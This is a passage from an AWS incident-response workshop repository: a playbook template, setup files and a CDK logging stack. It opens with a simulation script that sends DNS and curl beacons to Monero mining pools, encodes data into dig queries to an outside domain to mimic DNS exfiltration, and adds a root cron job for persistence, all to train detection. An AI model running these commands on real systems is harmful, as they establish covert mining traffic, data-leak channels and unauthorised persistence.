xmr.pool.minergate.comac" >> /usr/cryptokit/persist.sh 28 | echo "dig pool.minergate.com" >> /usr/cryptokit/persist.sh 29 | echo "dig dockerupdate.anondns.net" >> /usr/cryptokit/persist.sh 30 | echo "dig rspca-northamptonshire.org.uk" >> /usr/cryptokit/persist.sh 31 | echo "dig xmrpool.eu" >> /usr/cryptokit/persist.sh 32 | echo "dig cryptofollow.com" >> /usr/cryptokit/persist.sh 33 | echo "dig xmr-usa.dwarfpool.com" >> /usr/cryptokit/persist.sh 34 | echo "dig xmr-eu.dwarfpool.com" >> /usr/cryptokit/persist.sh 35 | echo "dig xmr-eu1.nanopool.org" >> /usr/cryptokit/persist.sh 36 | echo "curl -s http://pool.minergate.com/dkjdjkjdlsajdkljalsskajdksakjdksajkllalkdjsalkjdsalkjdlkasj > /dev/null &" >> /usr/cryptokit/persist.sh 37 | echo "curl -s http://xmr.pool.minergate.com/dhdhjkhdjkhdjkhajkhdjskahhjkhjkahdsjkakjasdhkjahdjk > /dev/null &" >> /usr/cryptokit/persist.sh 38 | echo "for i in {1..10};" >> /usr/cryptokit/persist.sh 39 | echo "do" >> /usr/cryptokit/persist.sh 40 | echo " dig CgpMb3JlbSBpcHN1bSBkb2xvciBzaXQgYW1ldC.afsdem.com;" >> /usr/cryptokit/persist.sh 41 | echo " dig wgY29uc2VjdGV0dXIgYWRpcGlzY2luZyBlbGl0.afsdem.com;" >> /usr/cryptokit/persist.sh 42 | echo " dig LiBWZXN0aWJ1bHVtIGFjIHJpc3VzIGRvbG9yLi.afsdem.com;" >> /usr/cryptokit/persist.sh 43 | echo " dig BJbiBldSBpbXBlcmRpZXQgbWksIGlkIHNjZWxl.afsdem.com;" >> /usr/cryptokit/persist.sh 44 | echo " dig cmlzcXVlIG9yY2kuIE51bGxhbSB1dCBsaWJlcm.afsdem.com;" >> /usr/cryptokit/persist.sh 45 | echo " dig 8gcHVydXMuIFBlbGxlbnRlc3F1ZSBhdCBmcmlu.afsdem.com;" >> /usr/cryptokit/persist.sh 46 | echo " dig Z2lsbGEgbWV0dXMsIGFjIHVsdHJpY2VzIGVyYX.afsdem.com;" >> /usr/cryptokit/persist.sh 47 | echo " dig QuIEZ1c2NlIGN1cnN1cyBtb2xsaXMgcmlzdXMg.afsdem.com;" >> /usr/cryptokit/persist.sh 48 | echo " dig dXQgdWx0cmljaWVzLiBOYW0gbWFzc2EganVzdG.afsdem.com;" >> /usr/cryptokit/persist.sh 49 | echo " dig 8sIHVsdHJpY2llcyBhdWN0b3IgbWkgdXQsIGRp.afsdem.com;" >> /usr/cryptokit/persist.sh 50 | echo " dig Y3R1bSBsb2JvcnRpcyBudWxsYS4gTnVsbGEgc2.afsdem.com;" >> /usr/cryptokit/persist.sh 51 | echo " dig l0IGFtZXQgZmVsaXMgbm9uIGlwc3VtIHZlc3Rp.afsdem.com;" >> /usr/cryptokit/persist.sh 52 | echo " dig YnVsdW0gcmhvbmN1cy4gTG9yZW0gaXBzdW0gZG.afsdem.com;" >> /usr/cryptokit/persist.sh 53 | echo " dig 9sb3Igc2l0IGFtZXQsIGNvbnNlY3RldHVyIGFk.afsdem.com;" >> /usr/cryptokit/persist.sh 54 | echo " dig aXBpc2NpbmcgZWxpdC4gSW4gZmF1Y2lidXMgaW.afsdem.com;" >> /usr/cryptokit/persist.sh 55 | echo " dig QgZWxpdCBhdCBtYXhpbXVzLiBBbGlxdWFtIGRh.afsdem.com;" >> /usr/cryptokit/persist.sh 56 | echo " dig cGlidXMgdXQgbWF1cmlzIG5lYyBmYXVjaWJ1cy.afsdem.com;" >> /usr/cryptokit/persist.sh 57 | echo " dig 4gUHJvaW4gYXVjdG9yIGxpYmVybyBuZWMgYXVn.afsdem.com;" >> /usr/cryptokit/persist.sh 58 | echo " dig dWUgc2FnaXR0aXMgY29uZGltZW50dW0uIFZlc3.afsdem.com;" >> /usr/cryptokit/persist.sh 59 | echo " dig RpYnVsdW0gYmliZW5kdW0gb2RpbyBxdWFtLCBh.afsdem.com;" >> /usr/cryptokit/persist.sh 60 | echo " dig dCBjb25ndWUgbnVsbGEgdml2ZXJyYSBpbi4gSW.afsdem.com;" >> /usr/cryptokit/persist.sh 61 | echo " dig 4gdWx0cmljaWVzIHR1cnBpcyBhdCBmYWNpbGlz.afsdem.com;" >> /usr/cryptokit/persist.sh 62 | echo " dig aXMgZGljdHVtLiBFdGlhbSBuaXNpIGFudGUsIG.afsdem.com;" >> /usr/cryptokit/persist.sh 63 | echo " dig RpY3R1bSBldCBoZW5kcmVyaXQgbmVjLCBzb2Rh.afsdem.com;" >> /usr/cryptokit/persist.sh 64 | echo " dig bGVzIGlkIGVyb3MuCgpQaGFzZWxsdXMgZmV1Z2.afsdem.com;" >> /usr/cryptokit/persist.sh 65 | echo " dig lhdCBudW5jIHNlZCBzdXNjaXBpdCBmYXVjaWJ1.afsdem.com;" >> /usr/cryptokit/persist.sh 66 | echo " dig cy4gQWVuZWFuIHRpbmNpZHVudCBwb3J0dGl0b3.afsdem.com;" >> /usr/cryptokit/persist.sh 67 | echo " dig IgbmlzbCwgdXQgY3Vyc3VzIGZlbGlzIHZvbHV0.afsdem.com;" >> /usr/cryptokit/persist.sh 68 | echo " dig cGF0IHZpdGFlLiBNb3JiaSBuZWMgbGVvIHB1bH.afsdem.com;" >> /usr/cryptokit/persist.sh 69 | echo " dig ZpbmFyLCBhY2N1bXNhbiBtYXVyaXMgbmVjLCBj.afsdem.com;" >> /usr/cryptokit/persist.sh 70 | echo " dig b21tb2RvIG1hdXJpcy4gTmFtIGNvbW1vZG8gZW.afsdem.com;" >> /usr/cryptokit/persist.sh 71 | echo " dig dldCBlbmltIGF0IGFsaXF1YW0uIFN1c3BlbmRp.afsdem.com;" >> /usr/cryptokit/persist.sh 72 | echo " dig c3NlIGVnZXN0YXMgbWFzc2EgaWQgcmlzdXMgcG.afsdem.com;" >> /usr/cryptokit/persist.sh 73 | echo " dig VsbGVudGVzcXVlIHBvcnR0aXRvciBuZWMgbmVj.afsdem.com;" >> /usr/cryptokit/persist.sh 74 | echo " dig IG5lcXVlLiBDcmFzIG5lYyBzZW0gYXJjdS4gTn.afsdem.com;" >> /usr/cryptokit/persist.sh 75 | echo " dig VsbGEgcXVpcyBzYXBpZW4gaW4gbGFjdXMgbGFj.afsdem.com;" >> /usr/cryptokit/persist.sh 76 | echo " dig aW5pYSB1bHRyaWNlcyBtYXR0aXMgZXQgcHVydX.afsdem.com;" >> /usr/cryptokit/persist.sh 77 | echo " dig MuIE51bmMgZmVybWVudHVtIG5lcXVlIGlkIG51.afsdem.com;" >> /usr/cryptokit/persist.sh 78 | echo " dig bmMgYmxhbmRpdCBtYXhpbXVzLiBEdWlzIGV1IH.afsdem.com;" >> /usr/cryptokit/persist.sh 79 | echo " dig NvbGxpY2l0dWRpbiBudWxsYSwgYWMgbWF0dGlz.afsdem.com;" >> /usr/cryptokit/persist.sh 80 | echo " dig IGF1Z3VlLiBNYXVyaXMgcXVpcyBjdXJzdXMgaX.afsdem.com;" >> /usr/cryptokit/persist.sh 81 | echo " dig BzdW0sIHF1aXMgZnJpbmdpbGxhIHNlbS4gTW9y.afsdem.com;" >> /usr/cryptokit/persist.sh 82 | echo " dig YmkgbWFsZXN1YWRhIHNhcGllbiBzZWQgbWV0dX.afsdem.com;" >> /usr/cryptokit/persist.sh 83 | echo " dig MgY29udmFsbGlzLCBzaXQgYW1ldCBldWlzbW9k.afsdem.com;" >> /usr/cryptokit/persist.sh 84 | echo " dig IGF1Z3VlIHBlbGxlbnRlc3F1ZS4gTW9yYmkgbm.afsdem.com;" >> /usr/cryptokit/persist.sh 85 | echo " dig liaCBlcmF0LCBwb3N1ZXJlIHNpdCBhbWV0IGFj.afsdem.com;" >> /usr/cryptokit/persist.sh 86 | echo " dig Y3Vtc2FuIG5lYywgbWFsZXN1YWRhIGEgbGVvLg.afsdem.com;" >> /usr/cryptokit/persist.sh 87 | echo " dig oKRG9uZWMgZXUgcHJldGl1bSBvZGlvLiBBZW5l.afsdem.com;" >> /usr/cryptokit/persist.sh 88 | echo " dig YW4gdHJpc3RpcXVlIHF1YW0gdmVsIG9yY2kgYW.afsdem.com;" >> /usr/cryptokit/persist.sh 89 | echo " dig xpcXVhbSwgbmVjIHNjZWxlcmlzcXVlIG51bmMg.afsdem.com;" >> /usr/cryptokit/persist.sh 90 | echo " dig c3VzY2lwaXQuIEV0aWFtIGVsaXQgc2VtLCB2aX.afsdem.com;" >> /usr/cryptokit/persist.sh 91 | echo " dig ZlcnJhIG5lYyBmcmluZ2lsbGEgdml0YWUsIGV1.afsdem.com;" >> /usr/cryptokit/persist.sh 92 | echo " dig aXNtb2QgaWQgdHVycGlzLiBJbnRlZ2VyIHF1aX.afsdem.com;" >> /usr/cryptokit/persist.sh 93 | echo " dig MgZXJhdCBlZ2V0IGFyY3UgdGluY2lkdW50IHBl.afsdem.com;" >> /usr/cryptokit/persist.sh 94 | echo " dig bGxlbnRlc3F1ZS4gQ3VyYWJpdHVyIHF1YW0gbn.afsdem.com;" >> /usr/cryptokit/persist.sh 95 | echo " dig VsbGEsIGx1Y3R1cyB2ZWwgdm9sdXRwYXQgZWdl.afsdem.com;" >> /usr/cryptokit/persist.sh 96 | echo " dig dCwgZGFwaWJ1cyBldCBudW5jLiBOdW5jIHF1aX.afsdem.com;" >> /usr/cryptokit/persist.sh 97 | echo " dig MgbGliZXJvIGFsaXF1YW0sIGNvbmRpbWVudHVt.afsdem.com;" >> /usr/cryptokit/persist.sh 98 | echo " dig IGp1c3RvIHF1aXMsIGxhY2luaWEgbmVxdWUuIF.afsdem.com;" >> /usr/cryptokit/persist.sh 99 | echo " dig Byb2luIGRhcGlidXMgZWxpdCBhdCBoZW5kcmVy.afsdem.com;" >> /usr/cryptokit/persist.sh 100 | echo " dig aXQgbWF4aW11cy4gU2VkIHNlbXBlciBudW5jIG.afsdem.com;" >> /usr/cryptokit/persist.sh 101 | echo " dig 1hc3NhLCBlZ2V0IHBlbGxlbnRlc3F1ZSBlbGl0.afsdem.com;" >> /usr/cryptokit/persist.sh 102 | echo " dig IHNhZ2l0dGlzIHNlZC4g.afsdem.com;" >> /usr/cryptokit/persist.sh 103 | echo "done" >> /usr/cryptokit/persist.sh 104 | one_call=$(/usr/cryptokit/persist.sh) 105 | touch /var/spool/cron/root 106 | /usr/bin/crontab /var/spool/cron/root 107 | echo "*/15 * * * * /usr/cryptokit/persist.sh" >> /var/spool/cron/root 108 | --// 109 | 110 | -------------------------------------------------------------------------------- /playbooks/template/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/template/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/template/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/template/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/template/threat_name.md: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | PLEASE NOTE THIS PLAYBOOK USES FICTITIOUS ENTITIES SUCH AS ```AKIAIOSFODNN7EXAMPLE``` FOR *IAM ACCESS KEY ID*, ```198.51.100.77``` FOR *IP ADDRESS*, AND ARBITRARY *DATE RANGES* FOR ATHENA QUERIES AND AWS CLI COMMANDS. YOU WILL NEED TO REPLACE THOSE WITH ACTUALS FROM THE AWS ACCOUNT YOU ARE USING. 4 | 5 | --- 6 | 7 | 8 | # Threat name playbook 9 | 10 | ## The threat 11 | 12 | [//]: # (Describe the threat this playbook addresses) 13 | 14 | This playbook addresses threat alpha which would impact workload bravo. The alerts used to trigger this playbook are alert charlie from GuardDuty, or alert echo from CloudWatch Rule foxtrot. 15 | 16 | * * * 17 | 18 | ## Objectives 19 | 20 | [//]: # (replace with your own words what are the expected outcomes by running this playbook) 21 | 22 | Throughout the execution of the playbook, focus on the _***desired outcomes***_, taking notes for enhancement of incident response capabilities. 23 | 24 | ### Determine: 25 | 26 | * **Vulnerabilities exploited** 27 | * **Exploits and tools observed** 28 | * **Actor's intent** 29 | * **Actor's attribution** 30 | * **Damage inflicted to the environment and business** 31 | 32 | ### Recover: 33 | 34 | * **Return to original and hardened configuration** 35 | 36 | ### Enhance CAF Security Perspective components: 37 | [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf) 38 | * **Directive** 39 | * **Detective** 40 | * **Responsive** 41 | * **Preventative** 42 | 43 | ![Image](images/aws_caf.png) 44 | * * * 45 | 46 | ## Response steps 47 | 48 | [//]: # (write down the steps to be taken labeling according to NIST 800-61r2 incident response life-cycle) 49 | 50 | 1. [**ANALYSIS**] Alert validation 51 | 2. [**ANALYSIS**] Scope of the incident 52 | 3. [**ANALYSIS**] Impact to environment 53 | 4. [**CONTAINMENT**] Perform containment 54 | 5. [**RECOVERY**] Perform recovery 55 | 6. [**ERADICATION**] Perform eradication (apply security updates and harden configuration) 56 | 7. [**RECOVERY**] Perform recovery by restoring system data and rebuilding components 57 | 8. [**POST-INCIDENT ACTIVITY**] Perform post-incident activity for preparation enhancement 58 | 59 | ### Incident Response Life Cycle (NIST 800-61r2) 60 | [NIST Computer Security Incident Handling Guide](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf) 61 | ![Image](images/nist_life_cycle.png) 62 | 63 | * * * 64 | 65 | ## Activity simulated for this playbook 66 | 67 | [//]: # (describe how the alerts can be simulated for playbook validation purposes) 68 | 69 | 1. Actor performs technique alpha 70 | 2. Actor performs technique bravo 71 | 3. Actor performs technique charlie 72 | 73 | ### Bash scripts found under the simulation directory. 74 | 75 | Example: 76 | 77 | > ./simulate.sh us-west-2 111122223333 78 | 79 | ``` 80 | #!/bin/bash 81 | region=${1} 82 | victim_account=${2} 83 | echo "this script targets AWS Region=${region} and AWS Account id=${victim_account}" 84 | ``` 85 | Output from bash script: 86 | 87 | ``` 88 | output expected 89 | ``` 90 | 91 | * * * 92 | 93 | ### IAM entitlements used for this playbook 94 | 95 | The following IAM Roles are available in the AWS account to assume 96 | 97 | #### SecurityAnalystRole 98 | - For Athena queries: custom IAM Policy 99 | - To perform analysis tasks: [ReadOnlyAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/ReadOnlyAccess) 100 | 101 | #### SecurityDeployRole 102 | - For resource deployment using CloudFormation 103 | 104 | #### SecurityBreakGlassRole 105 | - To perform containment, and eradication tasks: [AdministratorAccess](https://console.aws.amazon.com/iam/home#policies/arn:aws:iam::aws:policy/AdministratorAccess) 106 | 107 | #### SecurityAdminRole 108 | - To perform security tool administrative tasks such as Athena or GuardDuty administration: customer IAM Policy 109 | 110 | ## Assuming Roles: 111 | - CloudShell provides a Linux shell environment with temporary credentials associated with the current IAM Role you are signed in to the console. The AWS CLI will use these session tokens by default. 112 | - Alternatively you can install the AWS CLI in Windows, Linux, and MacOS and configure multiple IAM Roles to be assumed using the `-- profile` parameter. 113 | 114 | **All examples in this playbook use the `--profile` parameter to indicate the IAM Role required for the AWS CLI command. If you use CloudShell, remove the `--profile` parameter from the AWS CLI call.** 115 | 116 | * * * 117 | 118 | ## Incident Classification & Handling 119 | 120 | [//]: # (categorize the incident according to your organization's standards) 121 | 122 | * **Tactics, techniques, and procedures**: TTPs 123 | * **Category**: Category 124 | * **Resource**: Resources 125 | * **Tooling**: [AWS Command Line Interface](https://docs.aws.amazon.com/cli/latest/index.html) (CLI), [Amazon Athena](https://docs.aws.amazon.com/athena/latest/ug/querying-AWS-service-logs.html) 126 | * **Indicators**: 127 | * Custom CloudWatch Rule 128 | * [GuardDuty Finding alpha](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) 129 | * **Log Sources**: AWS CloudTrail, VPC Flow, Route53 VPC DNS, Amazon GuardDuty 130 | * **Teams**: Alpha, Bravo, and Charlie 131 | 132 | * * * 133 | 134 | ## Incident Handling Process 135 | 136 | ### The incident response process is comprised of the following: 137 | 138 | [//]: # (Detail the 'response steps' previously outlined) 139 | 140 | * Part 1: Analysis - Validation 141 | * Part 2: Analysis - Scope 142 | * Part 3: Analysis - Impact 143 | * Part 4: Containment 144 | * Part 5: Eradication 145 | * Part 6: Recovery 146 | * Part 7: Post-Incident Activity 147 | 148 | ### Part 1: Analysis - Validation 149 | 150 | [//]: # (validate alert) 151 | 152 | *Verify the integrity of the alert by checking if the indicator exists and comparing the alert data with the alert source. Any mismatch need to be notified to the team(s) responsible for designing, implementing, and maintaining the guardrail.* 153 | 154 | 1. Compare alert data with alert source 155 | 3. If there is a mismatch, escalate to teams alpha, bravo, and charlie. Upon their response, if possible, continue with **Part 2: Analysis - Alert Triage**, otherwise continue to **Part 6: Post-Incident Activity**. 156 | 5. If there is a match, continue to **Part 2: Analysis - Alert Scope** 157 | 158 | 159 | **Retrieve alert data** 160 | 161 | [//]: # (describe how to retrieve the alert data to compare with the alert source) 162 | 163 | ``` 164 | retrieve alert data directions 165 | ``` 166 | 167 | **Queries used for alert validation** 168 | 169 | ``` 170 | SELECT * FROM logs; 171 | 172 | ``` 173 | 174 | ### Part 2: Analysis - Scope 175 | 176 | [//]: # (consolidate the list of all AWS resources affected) 177 | 178 | *Collect the related activity recorded in CloudTrail, VPC Flow, and Route53 VPC DNS for analysis. This data should be saved in a secure location where incident response team members have the appropriate access to perform their role.* 179 | 180 | **Queries used for scoping** 181 | 182 | ``` 183 | SELECT * FROM logs; 184 | 185 | ``` 186 | 187 | [//]: # (check source IP addresses against threat intelligence field) 188 | 189 | **Determine reputation of IP addresses used with AWS API calls with the principal against a list containing details such as Cyber Threat Intelligence scores, and known/approved IP addresses used by the organization.** 190 | 191 | 192 | ``` 193 | WHOIS 203.0.113.43 194 | ``` 195 | 196 | ### Part 3: Analysis - Impact 197 | 198 | [//]: # (analyze the information gathered throughout scoping) 199 | 200 | Parse through the distilled information looking for patterns, extrapolate into behaviors that contrast with expected baseline of approved activity. Take a holistic approach looking at the data presented to you and continuously ask yourself if the constructed patterns represent normal behavior, external actor, or insider. The following questions will serve as a guide, but don’t limit yourself, expand based on your own findings and doubts. Make sure to have *data* backing up your answers: 201 | 202 | 1. What related alerts have been triggered? 203 | 2. What is the classification of the data accessed? 204 | 3. What AWS services are not in the approved use list? 205 | 4. What AWS service configurations have been changed? 206 | 5. What guardrails have been disabled or modified? 207 | 6. Was the actor an insider or outsider? 208 | 7. What evidence supports benign and malicious activity? 209 | 8. What is the impact to business applications and processes? 210 | 9. Is there any indication of possible exfiltration of data? 211 | 212 | ### Part 4: Containment 213 | 214 | [//]: # (prevent further damage to the environment and business processes) 215 | 216 | ### Part 5: Eradication 217 | 218 | [//]: # (destroy all components configured by the actor) 219 | 220 | ### Part 6: Recovery 221 | 222 | [//]: # (restore configuration from backup and rebuild components as needed) 223 | 224 | ### Part 7: Post-Incident Activity 225 | 226 | [//]: # (review all notes taken during the incident, submit for review proposed changes to enhance the security posture and incident response capabilities) 227 | 228 | 229 | * * * 230 | -------------------------------------------------------------------------------- /readme-images/diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/readme-images/diagram.png -------------------------------------------------------------------------------- /remove_cdk_metadata.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # automatic removal of references to AWS CDK bootstrap using `yq` 3 | yq -i 'del(.Rules)' cdk.out/WorkshopStack.yaml 4 | yq -i 'del(.Conditions)' cdk.out/WorkshopStack.yaml 5 | yq -i 'del(.Parameters.BootstrapVersion)' cdk.out/WorkshopStack.yaml 6 | yq -i 'del(.Resources.CDKMetadata)' cdk.out/WorkshopStack.yaml 7 | # end -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pylint 2 | black 3 | -e . -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | # SPDX-License-Identifier: MIT-0 3 | import setuptools 4 | 5 | AWS_CDK_VERSION = "2.128" 6 | 7 | with open("README.md") as fp: 8 | long_description = fp.read() 9 | 10 | 11 | setuptools.setup( 12 | name="BuildingAWSIRPlaybooksWorkshop", 13 | version="1.0", 14 | 15 | description="Building playbooks for incident response in AWS workshop", 16 | long_description=long_description, 17 | long_description_content_type="text/markdown", 18 | 19 | author="AWS", 20 | 21 | package_dir={"": "."}, 22 | packages=setuptools.find_packages(where="."), 23 | 24 | install_requires=[ 25 | "aws-cdk-lib==" + AWS_CDK_VERSION, 26 | ], 27 | 28 | python_requires=">=3.10", 29 | 30 | classifiers=[ 31 | "Development Status :: 4 - Beta", 32 | "Intended Audience :: Developers", 33 | "Programming Language :: JavaScript", 34 | "Programming Language :: Python :: 3 :: Only", 35 | "Programming Language :: Python :: 3.10", 36 | "Programming Language :: Python :: 3.11", 37 | "Topic :: Software Development :: Code Generators", 38 | "Topic :: Utilities", 39 | "Typing :: Typed", 40 | ], 41 | ) 42 | -------------------------------------------------------------------------------- /workshop_stack.py: -------------------------------------------------------------------------------- 1 | """ 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | 5 | # Building Incident Response Playbooks for AWS 6 | 7 | ## Workshop stack 8 | """ 9 | from aws_cdk import ( 10 | Aws, 11 | Stack, 12 | CfnOutput, 13 | CfnParameter, 14 | aws_s3, 15 | aws_athena, 16 | aws_cloudtrail, 17 | aws_glue, 18 | aws_ec2, 19 | aws_route53resolver, 20 | aws_iam, 21 | ) 22 | 23 | from constructs import Construct 24 | 25 | class WorkshopStack(Stack): 26 | def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None: 27 | super().__init__(scope, construct_id, **kwargs) 28 | 29 | logging_bucket = aws_s3.Bucket( 30 | self, 31 | "BucketLogs", 32 | block_public_access=aws_s3.BlockPublicAccess.BLOCK_ALL, 33 | encryption=aws_s3.BucketEncryption.S3_MANAGED, 34 | ) 35 | athena_bucket = aws_s3.Bucket( 36 | self, 37 | "BucketAthena", 38 | ) 39 | cloutrail_trail = aws_cloudtrail.Trail( 40 | self, 41 | "Trail", 42 | is_multi_region_trail=True, 43 | enable_file_validation=True, 44 | bucket=logging_bucket, 45 | trail_name="IRWorkshopTrail", 46 | ) 47 | logging_bucket.add_to_resource_policy( 48 | aws_iam.PolicyStatement( 49 | sid="AllowAWSServiceGetBucketAcl", 50 | effect=aws_iam.Effect.ALLOW, 51 | principals=[aws_iam.ServicePrincipal(service="delivery.logs.amazonaws.com")], 52 | actions=["s3:GetBucketAcl"], 53 | resources=[logging_bucket.bucket_arn], 54 | ) 55 | ) 56 | logging_bucket.add_to_resource_policy( 57 | aws_iam.PolicyStatement( 58 | sid="AllowAWSServicePutObject", 59 | effect=aws_iam.Effect.ALLOW, 60 | principals=[aws_iam.ServicePrincipal(service="delivery.logs.amazonaws.com")], 61 | actions=["s3:PutObject"], 62 | resources=[logging_bucket.bucket_arn + "/*"], 63 | conditions={ 64 | "StringEquals": { 65 | "s3:x-amz-acl": "bucket-owner-full-control" 66 | } 67 | }, 68 | ) 69 | ) 70 | cloutrail_trail.log_all_s3_data_events() 71 | vpc_subnets = [aws_ec2.SubnetConfiguration( 72 | subnet_type=aws_ec2.SubnetType.PUBLIC, 73 | name="Public", 74 | cidr_mask=24 75 | ), 76 | aws_ec2.SubnetConfiguration( 77 | subnet_type=aws_ec2.SubnetType.PRIVATE_ISOLATED, 78 | name="Private", 79 | cidr_mask=24 80 | )] 81 | vpc = aws_ec2.Vpc( 82 | self, 83 | "VPC", 84 | ip_addresses=aws_ec2.IpAddresses.cidr("192.168.0.0/16"), 85 | max_azs=2, 86 | subnet_configuration=vpc_subnets, 87 | nat_gateways=0, 88 | ) 89 | security_group = aws_ec2.SecurityGroup( 90 | self, 91 | "SecurityGroup", 92 | vpc=vpc, 93 | description="Allow all outbound and allow SSH from internet", 94 | ) 95 | security_group.add_ingress_rule( 96 | connection=aws_ec2.Port.tcp(443), 97 | description="allow HTTPS TCP/443 within VPC CIDR", 98 | peer=aws_ec2.Peer.ipv4("192.168.0.0/16"), 99 | ) 100 | security_group.add_ingress_rule( 101 | connection=aws_ec2.Port.tcp(22), 102 | description="allow SSH TCP/22 to internet", 103 | peer=aws_ec2.Peer.ipv4("0.0.0.0/0"), 104 | ) 105 | just_an_instance_role = aws_iam.Role( 106 | self, 107 | "instance role", 108 | assumed_by=aws_iam.ServicePrincipal("ec2.amazonaws.com"), 109 | managed_policies=[ 110 | aws_iam.ManagedPolicy.from_aws_managed_policy_name( 111 | "AmazonSSMManagedInstanceCore") 112 | ], 113 | ) 114 | just_an_instance = aws_ec2.Instance( 115 | self, 116 | "JustAnInstance", 117 | allow_all_outbound=True, 118 | instance_name="just_an_instance", 119 | instance_type=aws_ec2.InstanceType("t3.small"), 120 | machine_image=aws_ec2.MachineImage.latest_amazon_linux2023(), 121 | vpc=vpc, 122 | vpc_subnets=aws_ec2.SubnetSelection( 123 | subnet_type=aws_ec2.SubnetType.PUBLIC 124 | ), 125 | security_group=security_group, 126 | role=just_an_instance_role, 127 | ) 128 | vpc_flow_log = aws_ec2.CfnFlowLog( 129 | self, 130 | "VPCFlowLog", 131 | resource_id=vpc.vpc_id, 132 | resource_type="VPC", 133 | traffic_type="ALL", 134 | log_destination_type="s3", 135 | log_destination=logging_bucket.bucket_arn, 136 | log_format="".join(["${version} ${account-id} ${interface-id} ${srcaddr} ${dstaddr} ${srcport} ${dstport} ", 137 | "${protocol} ${packets} ${bytes} ${start} ${end} ${action} ${log-status} ${vpc-id} ", 138 | "${subnet-id} ${instance-id} ${tcp-flags} ${type} ${pkt-srcaddr} ${pkt-dstaddr} ", 139 | "${region} ${az-id} ${sublocation-type} ${sublocation-id} ${pkt-src-aws-service} ", 140 | "${pkt-dst-aws-service} ${flow-direction} ${traffic-path}"]), 141 | max_aggregation_interval=60, 142 | ) 143 | dns_logs = aws_route53resolver.CfnResolverQueryLoggingConfig( 144 | self, 145 | "DNSLogs", 146 | destination_arn=logging_bucket.bucket_arn, 147 | name="DNS Logs for IR Workshop", 148 | ) 149 | dns_logs_association = aws_route53resolver.CfnResolverQueryLoggingConfigAssociation( 150 | self, 151 | "DNSLogsAssociation", 152 | resolver_query_log_config_id=dns_logs.attr_id, 153 | resource_id=vpc.vpc_id, 154 | ) 155 | dns_logs_association.add_dependency(dns_logs) 156 | athena_workgroup_output_location = "".join(["s3://", 157 | athena_bucket.bucket_name, 158 | "/"]) 159 | 160 | CfnParamAthenaEngineVersion = CfnParameter( 161 | self, 162 | "ParamAthenaEngineVersion", 163 | type="String", 164 | default="Athena engine version 3", 165 | description="Athena Engine Version", 166 | ) 167 | 168 | athena_workgroup = aws_athena.CfnWorkGroup( 169 | self, 170 | "AthenaWorkGroup", 171 | name="IRWorkshopAthenaWorkGroup", 172 | state="ENABLED", 173 | recursive_delete_option=True, 174 | work_group_configuration=aws_athena.CfnWorkGroup.WorkGroupConfigurationProperty( 175 | enforce_work_group_configuration=True, 176 | result_configuration=aws_athena.CfnWorkGroup.ResultConfigurationProperty( 177 | encryption_configuration=aws_athena.CfnWorkGroup.EncryptionConfigurationProperty( 178 | encryption_option="SSE_S3", 179 | ), 180 | output_location=athena_workgroup_output_location, 181 | ), 182 | requester_pays_enabled=False, 183 | publish_cloud_watch_metrics_enabled=False, 184 | engine_version=aws_athena.CfnWorkGroup.EngineVersionProperty( 185 | selected_engine_version=CfnParamAthenaEngineVersion.value_as_string, 186 | ) 187 | ) 188 | ) 189 | CfnOutput( 190 | self, 191 | "AthenaWorkgroupQueryOutputLocation", 192 | description="Athena Workgroup queries output location", 193 | value=athena_workgroup_output_location, 194 | ) 195 | CfnOutput( 196 | self, 197 | "AthenaWorkgroupName", 198 | description="Athena Workgroup for workshop use", 199 | value=athena_workgroup.name, 200 | ) 201 | glue_database = aws_glue.CfnDatabase( 202 | self, 203 | "IRWorkshopGlueDatabase", 204 | catalog_id=Aws.ACCOUNT_ID, 205 | database_input=aws_glue.CfnDatabase.DatabaseInputProperty( 206 | name="irworkshopgluedatabase", 207 | ), 208 | ) 209 | CfnParamCloudTrailProjectionEventStartDate = CfnParameter( 210 | self, 211 | "ParamCloudTrailProjectionEventStartDate", 212 | type="String", 213 | default="2021/06/14", 214 | description="Athena CloudTrail Table Projection Partition Start Date", 215 | ) 216 | RegionPartitionValues = "".join(["us-east-2,us-east-1,us-west-1,us-west-2,af-south-1,ap-east-1,", 217 | "ap-south-1,ap-northeast-3,ap-northeast-2,ap-southeast-1,ap-southeast-2,", 218 | "ap-northeast-1,ca-central-1,cn-north-1,cn-northwest-1,eu-central-1,", 219 | "eu-west-1,eu-west-2,eu-south-1,eu-west-3,eu-north-1,me-south-1,sa-east-1"]) 220 | CloudTrailProjectionDateRange = CfnParamCloudTrailProjectionEventStartDate.value_as_string + ", NOW" 221 | CloudTrailSource = "".join(["s3://", 222 | logging_bucket.bucket_name, 223 | "/AWSLogs/", 224 | "${account_partition}/CloudTrail/${region_partition}/${date_partition}"]) 225 | glue_table_cloudtrail_parameters = { 226 | "classification": "json", 227 | "EXTERNAL": "true", 228 | "projection.enabled": "true", 229 | "projection.date_partition.type": "date", 230 | "projection.date_partition.range": CloudTrailProjectionDateRange, 231 | "projection.date_partition.format": "yyyy/MM/dd", 232 | "projection.date_partition.interval": "1", 233 | "projection.date_partition.interval.unit": "DAYS", 234 | "projection.region_partition.type": "enum", 235 | "projection.region_partition.values": RegionPartitionValues, 236 | "projection.account_partition.type": "enum", 237 